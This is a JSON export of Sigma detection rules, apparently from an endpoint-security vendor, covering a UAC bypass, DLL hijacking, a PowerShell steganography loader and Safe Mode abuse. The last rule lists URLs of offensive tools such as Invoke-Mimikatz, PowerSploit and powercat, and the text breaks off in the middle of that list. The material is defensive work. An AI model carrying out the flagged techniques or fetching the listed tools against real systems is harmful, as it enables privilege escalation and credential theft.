"last_update": "2026-03-23T11:45:34.074233Z",
"creation_date": "2026-03-23T11:45:34.074235Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074239Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME"
],
"name": "t1548_002_uac_bypass_credwiz.yml",
"content": "title: UAC Bypass Executed via credwiz\nid: 1f520703-a22a-4e93-8e0f-30cd3c1272f1\ndescription: |\n Detects a UAC bypass via credwiz.exe.\n This alert triggers on credwiz.exe, or on a renamed copy placed at System32\\wbem\\oobe.exe, loading a netutils.dll that is not signed by Microsoft.\n Adversaries may bypass UAC mechanisms to elevate process privileges on the system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the responsible process and user session to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\ndate: 2021/01/06\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_standard_hijack:\n Image: '?:\\Windows\\System32\\credwiz.exe'\n ImageLoaded|endswith: '\\netutils.dll'\n\n selection_renamed_hijack:\n Image: '?:\\Windows\\System32\\wbem\\oobe.exe'\n ImageLoaded|endswith: '\\netutils.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: 1 of selection_* and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1f520703-a22a-4e93-8e0f-30cd3c1272f1",
"rule_name": "UAC Bypass Executed via credwiz",
"rule_description": "Detects a UAC bypass via credwiz.exe.\nThis alert triggers on credwiz.exe, or on a renamed copy placed at System32\\wbem\\oobe.exe, loading a netutils.dll that is not signed by Microsoft.\nAdversaries may bypass UAC mechanisms to elevate process privileges on the system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the responsible process and user session to look for malicious content or actions.\n",
"rule_creation_date": "2021-01-06",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1f5a2648-0258-4ffe-93b8-f4aa01a21d2c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.615245Z",
"creation_date": "2026-03-23T11:45:34.615249Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.615256Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Rasautou/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_rasautou_execution_proxy.yml",
"content": "title: DLL Loaded via Rasautou.exe\nid: 1f5a2648-0258-4ffe-93b8-f4aa01a21d2c\ndescription: |\n Detects a potentially malicious use of Rasautou.exe to load an arbitrary DLL file.\n Adversaries may use the -d and -p flags to load and execute an arbitrary DLL within Rasautou.exe and bypass security restrictions.\n The rule matches on the binary's original file name (rasdlui.exe), so renamed copies of Rasautou.exe are covered as well.\n Note that Microsoft removed these parameters starting with Windows 10, so only older Windows versions are affected.\n It is recommended to check for suspicious activity from the executed process and its parents.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Rasautou/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2024/03/18\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rasautou\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'rasdlui.exe'\n CommandLine|contains|all:\n - '-d'\n - '-p'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1f5a2648-0258-4ffe-93b8-f4aa01a21d2c",
"rule_name": "DLL Loaded via Rasautou.exe",
"rule_description": "Detects a potentially malicious use of Rasautou.exe to load an arbitrary DLL file.\nAdversaries may use the -d and -p flags to load and execute an arbitrary DLL within Rasautou.exe and bypass security restrictions.\nThe rule matches on the binary's original file name (rasdlui.exe), so renamed copies of Rasautou.exe are covered as well.\nNote that Microsoft removed these parameters starting with Windows 10, so only older Windows versions are affected.\nIt is recommended to check for suspicious activity from the executed process and its parents.\n",
"rule_creation_date": "2024-03-18",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1f8de2c5-e4de-49b9-8e1e-9753cb9c3f48",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619770Z",
"creation_date": "2026-03-23T11:45:34.619773Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619777Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1087/001/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_w_macos.yml",
"content": "title: Current Logged In Users Discovered via W\nid: 1f8de2c5-e4de-49b9-8e1e-9753cb9c3f48\ndescription: |\n Detects the execution of the w command.\n Attackers may use it during the discovery phase of an attack to retrieve the list of users currently logged in and their last action on the system.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1087/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/14\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/w'\n ParentImage|contains: '?'\n\n exclusion_globalprotect:\n GrandparentImage: '/Applications/GlobalProtect.app/Contents/MacOS/GlobalProtect'\n\n exclusion_kaspersky:\n ParentImage: '/Applications/Kaspersky Anti-Virus For Mac.app/Contents/MacOS/kavd.app/Contents/MacOS/kavd'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1f8de2c5-e4de-49b9-8e1e-9753cb9c3f48",
"rule_name": "Current Logged In Users Discovered via W",
"rule_description": "Detects the execution of the w command.\nAttackers may use it during the discovery phase of an attack to retrieve the list of users currently logged in and their last action on the system.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1f9140ad-7310-4971-817e-bc52afe6b553",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087751Z",
"creation_date": "2026-03-23T11:45:34.087753Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087757Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/"
],
"name": "t1529_enable_safemode.yml",
"content": "title: Windows Safe-Mode Enabled\nid: 1f9140ad-7310-4971-817e-bc52afe6b553\ndescription: |\n Detects the activation of the Windows Safe-Mode.\n When restarted in Safe-Mode, many detection features are disabled.\n Attackers may enable Windows Safe-Mode to disable detection software and avoid detection.\n It is recommended to investigate the parent process to determine if this action was legitimate.\nreferences:\n - https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/\ndate: 2021/03/19\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1529\n - attack.t1542\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\bcdedit.exe'\n - OriginalFileName: 'bcdedit.exe'\n selection_2:\n CommandLine|contains|all:\n - '/set'\n - 'safeboot'\n selection_3:\n CommandLine|contains:\n - 'minimal'\n - 'network'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1f9140ad-7310-4971-817e-bc52afe6b553",
"rule_name": "Windows Safe-Mode Enabled",
"rule_description": "Detects the activation of the Windows Safe-Mode.\nWhen restarted in Safe-Mode, many detection features are disabled.\nAttackers may enable Windows Safe-Mode to disable detection software and avoid detection.\nIt is recommended to investigate the parent process to determine if this action was legitimate.\n",
"rule_creation_date": "2021-03-19",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1529",
"attack.t1542"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1fa76d65-e12e-4570-a4d7-bec1023044e3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093760Z",
"creation_date": "2026-03-23T11:45:34.093762Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093766Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dfsdiag.yml",
"content": "title: DLL Hijacking via DfsDiag.exe\nid: 1fa76d65-e12e-4570-a4d7-bec1023044e3\ndescription: |\n Detects potential Windows DLL Hijacking via DfsDiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting a malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'DfsDiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\netapi32.dll'\n - '\\resutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1fa76d65-e12e-4570-a4d7-bec1023044e3",
"rule_name": "DLL Hijacking via DfsDiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via DfsDiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting a malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1fdb3367-1225-4b9e-99c5-2a202390b38b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606938Z",
"creation_date": "2026-03-23T11:45:34.606941Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606949Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@b.magnezi/malware-analysis-xworm-80b3bbb072fb",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1027/003/"
],
"name": "t1059_001_powershell_steganography_loader.yml",
"content": "title: PowerShell Steganography Loader\nid: 1fdb3367-1225-4b9e-99c5-2a202390b38b\ndescription: |\n Detects a specific PowerShell command-line used to download a JPG image containing a hidden base64-encoded .NET payload using a simple steganography technique.\n The .NET assembly then downloads the final malware payload, a RAT such as Remcos, injects it and starts its malicious operation within the victim’s system.\n This action is often related to a phishing campaign.\n It is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\nreferences:\n - https://medium.com/@b.magnezi/malware-analysis-xworm-80b3bbb072fb\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1027/003/\ndate: 2023/09/29\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1027.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains|all:\n - '<>'\n - '<>'\n - '[System.Convert]::FromBase64String('\n - '[System.Reflection.Assembly]::Load('\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1fdb3367-1225-4b9e-99c5-2a202390b38b",
"rule_name": "PowerShell Steganography Loader",
"rule_description": "Detects a specific PowerShell command-line used to download a JPG image containing a hidden base64-encoded .NET payload using a simple steganography technique.\nThe .NET assembly then downloads the final malware payload, a RAT such as Remcos, injects it and starts its malicious operation within the victim’s system.\nThis action is often related to a phishing campaign.\nIt is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2023-09-29",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1027.003",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2029c7d2-ce99-4765-bef4-8aa8277d9a50",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092344Z",
"creation_date": "2026-03-23T11:45:34.092346Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092351Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_urls_script.yml",
"content": "title: URLs of Malicious Code Repository in PowerShell Script\nid: 2029c7d2-ce99-4765-bef4-8aa8277d9a50\ndescription: |\n Detects PowerShell scripts containing URLs that reference known malicious code or offensive tooling repositories.\n Threat actors frequently use public repositories and open-source PowerShell scripts in their attacks.\n It is recommended to investigate the repository being accessed, and examine any files or data that may have been downloaded. If your organization is not undergoing a security audit, this could indicate the initial stages of an attack or ongoing malicious activity.\nreferences:\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/24\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_1:\n PowershellCommand|contains:\n - '/raw.githubusercontent.com/'\n - 'LwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - '8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n - 'vAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '/gist.githubusercontent.com/'\n - 'LwBnAGkAcwB0AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '8AZwBpAHMAdAAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - 'vAGcAaQBzAHQALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n\n selection_2:\n PowershellCommand|contains:\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Find-Fruit.ps1\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1\n - '/S3cur3Th1sSh1t/'\n # /S3cur3Th1sSh1t/ in UTF16-LE in base64 with 3 different offsets, for PowerShell command-lines\n - 'LwBTADMAYwB1AHIAMwBUAGgAMQBzAFMAaAAxAHQALw'\n - 
'8AUwAzAGMAdQByADMAVABoADEAcwBTAGgAMQB0AC8A'\n - 'vAFMAMwBjAHUAcgAzAFQAaAAxAHMAUwBoADEAdAAvA'\n # 'https://raw.githubusercontent.com/pwnieexpress/Metasploit-framework/master/exploits/powershell/powerdump.ps1\n - '/pwnieexpress/'\n - 'LwBwAHcAbgBpAGUAZQB4AHAAcgBlAHMAcwAvA'\n - '8AcAB3AG4AaQBlAGUAeABwAHIAZQBzAHMALw'\n - 'vAHAAdwBuAGkAZQBlAHgAcAByAGUAcwBzAC8A'\n # https://raw.githubusercontent.com/EmpireProject/Empire/master/module_source/credentials/Invoke-Mimikatz.ps1\n - '/EmpireProject/'\n - 'LwBFAG0AcABpAHIAZQBQAHIAbwBqAGUAYwB0AC8A'\n - '8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvA'\n - 'vAEUAbQBwAGkAcgBlAFAAcgBvAGoAZQBjAHQALw'\n # https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1\n - '/PowerSploit/'\n - 'LwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALw'\n - '8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8A'\n - 'vAFAAbwB3AGUAcgBTAHAAbABvAGkAdAAvA'\n # https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1\n - '/clymb3r/'\n - 'LwBjAGwAeQBtAGIAMwByAC8A'\n - '8AYwBsAHkAbQBiADMAcgAvA'\n - 'vAGMAbAB5AG0AYgAzAHIALw'\n - '/Invoke-Mimikatz/'\n - 'LwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAvA'\n - '8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALw'\n - 'vAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC8A'\n # https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1\n - '/BloodHoundAD/'\n - 'LwBCAGwAbwBvAGQASABvAHUAbgBkAEEARAAvA'\n - '8AQgBsAG8AbwBkAEgAbwB1AG4AZABBAEQALw'\n - 'vAEIAbABvAG8AZABIAG8AdQBuAGQAQQBEAC8A'\n # https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1\n - '/Kevin-Robertson/'\n - 'LwBLAGUAdgBpAG4ALQBSAG8AYgBlAHIAdABzAG8AbgAvA'\n - '8ASwBlAHYAaQBuAC0AUgBvAGIAZQByAHQAcwBvAG4ALw'\n - 'vAEsAZQB2AGkAbgAtAFIAbwBiAGUAcgB0AHMAbwBuAC8A'\n # https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/PowerSploit/Invoke-Mimikatz.ps1\n - '/Veil-Framework/'\n - 'LwBWAGUAaQBsAC0ARgByAGEAbQBlAHcAbwByAGsALw'\n - 
'8AVgBlAGkAbAAtAEYAcgBhAG0AZQB3AG8AcgBrAC8A'\n - 'vAFYAZQBpAGwALQBGAHIAYQBtAGUAdwBvAHIAawAvA'\n # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/Get-SPN/Get-SPN.psm1\n - '/nullbind/Powershellery/'\n - 'LwBuAHUAbABsAGIAaQBuAGQALwBQAG8AdwBlAHIAcwBoAGUAbABsAGUAcgB5AC8A'\n - '8AbgB1AGwAbABiAGkAbgBkAC8AUABvAHcAZQByAHMAaABlAGwAbABlAHIAeQAvA'\n - 'vAG4AdQBsAGwAYgBpAG4AZAAvAFAAbwB3AGUAcgBzAGgAZQBsAGwAZQByAHkALw'\n # https://gist.githubusercontent.com/shantanu561993/6483e524dc225a188de04465c8512909/raw/db219421ea911b820e9a484754f03a26fbfb9c27/AMSI_bypass_Reflection.ps1\n - '/shantanu561993/'\n - 'LwBzAGgAYQBuAHQAYQBuAHUANQA2ADEAOQA5ADMALw'\n - '8AcwBoAGEAbgB0AGEAbgB1ADUANgAxADkAOQAzAC8A'\n - 'vAHMAaABhAG4AdABhAG4AdQA1ADYAMQA5ADkAMwAvA'\n # https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\n - '/powercat/'\n - 'LwBwAG8AdwBlAHIAYwBhAHQALw'\n - '8AcABvAHcAZQByAGMAYQB0AC8A'\n - 'vAHAAbwB3AGUAcgBjAGEAdAAvA'\n # https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1\n - '/FuzzySecurity/PowerShell-Suite/'\n - 'LwBGAHUAegB6AHkAUwBlAGMAdQByAGkAdAB5AC8AUABvAHcAZQByAFMAaABlAGwAbAAtAFMAdQBpAHQAZQAvA'\n - '8ARgB1AHoAegB5AFMAZQBjAHUAcgBpAHQAeQAvAFAAbwB3AGUAcgBTAGgAZQBsAGwALQBTAHUAaQB0AGUALw'\n - 'vAEYAdQB6AHoAeQBTAGUAYwB1AHIAaQB0AHkALwBQAG8AdwBlAHIAUwBoAGUAbABsAC0AUwB1AGkAdABlAC8A'\n # https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1\n - '/The-Viper-One/'\n - 'LwBUAGgAZQAtAFYAaQBwAGUAcgAtAE8AbgBlAC8A'\n - '8AVABoAGUALQBWAGkAcABlAHIALQBPAG4AZQAvA'\n - 'vAFQAaABlAC0AVgBpAHAAZQByAC0ATwBuAGUALw'\n # https://raw.githubusercontent.com/leoloobeek/LAPSToolkit/refs/heads/master/LAPSToolkit.ps1\n - '/leoloobeek/'\n - 'LwBsAGUAbwBsAG8AbwBiAGUAZQBrAC8A'\n - '8AbABlAG8AbABvAG8AYgBlAGUAawAvA'\n - 'vAGwAZQBvAGwAbwBvAGIAZQBlAGsALw'\n # https://raw.githubusercontent.com/sense-of-security/ADRecon/refs/heads/master/ADRecon.ps1\n - '/sense-of-security/'\n - 
